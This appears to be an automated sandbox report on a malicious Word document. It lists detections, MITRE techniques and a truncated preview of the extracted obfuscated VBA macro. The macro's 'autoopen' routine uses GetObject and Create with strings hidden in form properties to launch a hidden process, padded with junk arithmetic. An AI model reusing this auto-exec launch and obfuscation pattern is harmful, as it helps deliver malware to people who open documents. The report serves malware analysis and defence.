MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing VBA macros. The 'autoopen' macro is present and uses a GetObject call, which is a common technique for executing arbitrary code. This suggests the macro is designed to download and execute a secondary payload. No specific family could be identified.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6905404-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6905404-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16253 bytes |
SHA-256: 2805b2ee5d868dc3dc6a29e49c48a6618e7cb2dbc33c61208bb5aaf194538ae1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MABX_AA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CAUAAD4A"
Attribute VB_Base = "0{58BDD7E3-CD44-4BBC-AD4C-5B2C1B4C737F}{D1FCCB9E-8A5A-438C-9695-53A6C7F26411}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "TAQZAQ"
Sub autoopen()
On Error Resume Next
If WB4kAxxU = jA1BGx Then
bAAQBBQ = CVar(bcAABGAc)
XkBAUZ = (361856692 + Rnd(swDGxXD * _
Tan(670207210 / Chr(959094389 / CDbl(BAXAZAUA) * GBwAAA / CDbl(945131424)))) * 5248483 * _
Atn(118102828 / Oct(270103415) - 498705691 * Int(UQA1UA)) * (476513465 - Atn(QQXkCA)))
FQwQUD = Int(fCAGBUXZ - _
mAkGADDA - 532937956 * Int(463911198))
End If
If BAAAAA = TwA_AZ Then
Q_1AxQAB = CVar(iwAQAoQ)
NZDQ_wAA = (456055239 + Rnd(CAXo4Z * _
Tan(110637946 / Chr(75687518 / CDbl(Ooxo_GA) * wC_AkwwG / CDbl(830735814)))) * 827179447 * _
Atn(745795208 / Oct(609503975) - 989914408 * Int(aUxDAQQA)) * (780105833 - Atn(iAAcBX1Z)))
dZDADA = Int(NA1AAD - _
k_XAZU_ - 128432854 * Int(636648753))
End If
Set mQAZBcAw = GetObject(CAUAAD4A.Tag + CAUAAD4A.pAA1AAw + CAUAAD4A.Tag)
If hDACDAA_ = rBAoAA4 Then
KxADoB = CVar(NkAAAD)
TAokxGBB = (83831580 + Rnd(VAAG1Bc * _
Tan(729045409 / Chr(745065093 / CDbl(JUAGAAAD) * iAGAAADQ / CDbl(472591411)))) * 780624623 * _
Atn(16730696 / Oct(765002805) - 907106983 * Int(v__UXD)) * (910452953 - Atn(E_BDxwQ)))
uAAGQB4 = Int(OwcAZB - _
s4UZUAA1 - 817613847 * Int(282481694))
End If
If zAAAX4 = scUBoD Then
oAAUAUwQ = CVar(BAUAQA)
ZAGA4CAA = (325604763 + Rnd(EDBDDA * _
Tan(537209165 / Chr(596191568 / CDbl(LkZAkB) * w_QQD4B / CDbl(134012084)))) * 617179906 * _
Atn(290909337 / Oct(301599142) - 371330800 * Int(YAkU_AA)) * (582876688 - Atn(fAAZAA_)))
vU1AB1cQ = Int(M1DAAGAk - _
MAD_cA - 325894414 * Int(332664317))
End If
mQAZBcAw.ShowWindow = 520547 - 520547
If QDQXoA = bAUBQAB Then
fA_BZAA = CVar(aUQwAA)
zkAQA_wU = (948186498 + Rnd(jUADcAZ * _
Tan(661997652 / Chr(404270844 / CDbl(XADG1D41) * RcGABA / CDbl(458913573)))) * 808576560 * _
Atn(244440450 / Oct(864696547) - 535289087 * Int(JA_xAAUA)) * (113810590 - Atn(jUAZAo)))
kA1ADCk = Int(sAU1Qo - _
rAQo4UwA - 572344987 * Int(744573596))
End If
If I4QAAw = GAUAQ_ Then
SBAwBAk = CVar(VxGAAUD)
IAABDQCA = (654080361 + Rnd(ZGAwZAXC * _
Tan(151615336 / Chr(439660132 / CDbl(M_AXAUG) * EGAwAA_ / CDbl(527140049)))) * 249906657 * _
Atn(775947477 / Oct(141053823) - 534070673 * Int(lBAAAQ)) * (165508903 - Atn(oQCD_AA)))
DXUxBcAA = Int(uGwCQUX - _
tox_A1Q_ - 497083825 * Int(717881341))
End If
If iAQAABUD = rU1oGD1 Then
cUBUUX = CVar(NABAA_)
lUAoCBA = (182176414 + Rnd(l_DAcCx * _
Tan(102860209 / Chr(670300922 / CDbl(tAkAQkGA) * NA1CcB / CDbl(707709011)))) * 212994341 * _
Atn(970779812 / Oct(75768412) - 667968822 * Int(ZkCBAA)) * (307409386 - Atn(ioBA4AA_)))
qU_XD_xD = Int(k1D_AA44 - _
RBA_4A - 97695298 * Int(628776459))
End If
GetObject(CAUAAD4A.Tag + CAUAAD4A.AkwAokG + CAUAAD4A.Tag). _
Create CAUAAD4A.Tag + CAUAAD4A.l4k_GAcD + CAUAAD4A.Tag + CAUAAD4A.nc_AcAA + CAUAAD4A.Tag + CAUAAD4A.Tag + CAUAAD4A.V_k4AABZ + CAUAAD4A.Tag + CAUAAD4A.Tag + CAUAAD4A.TDQAAkAw + CAUAAD4A.Tag + CAUAAD4A.iBQQDoZG + CAUAAD4A.Tag, jX_ZGUc, mQAZBcAw, CAUAAD4A.Tag
If zUAB_UQ = iQAAB1Ao Then
qBGBACQo = CVar(NAQBDcX)
TDAQxBZA = (965229187 + Rnd(VUG1QA1 * _
Tan(803650193 / Chr(951259717 / CDbl(bD_UBcAo) * sXoUAQ / CDbl(673736416)))) * 999341581 * _
Atn(815677241 / Oct(209115507) - 562706653 * Int(LoDZAQ)) * (669032359 - Atn(D_BB14x)))
EUAQXAAD = Int(pkADAAA - _
aAAXGD - 123054732 * Int(423442300))
End If
If ZDUCAADk = DAAAA_Dx Then
bcAAx_G = CVar(wAAXAZAU)
i_DBBGUB = (3325171
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.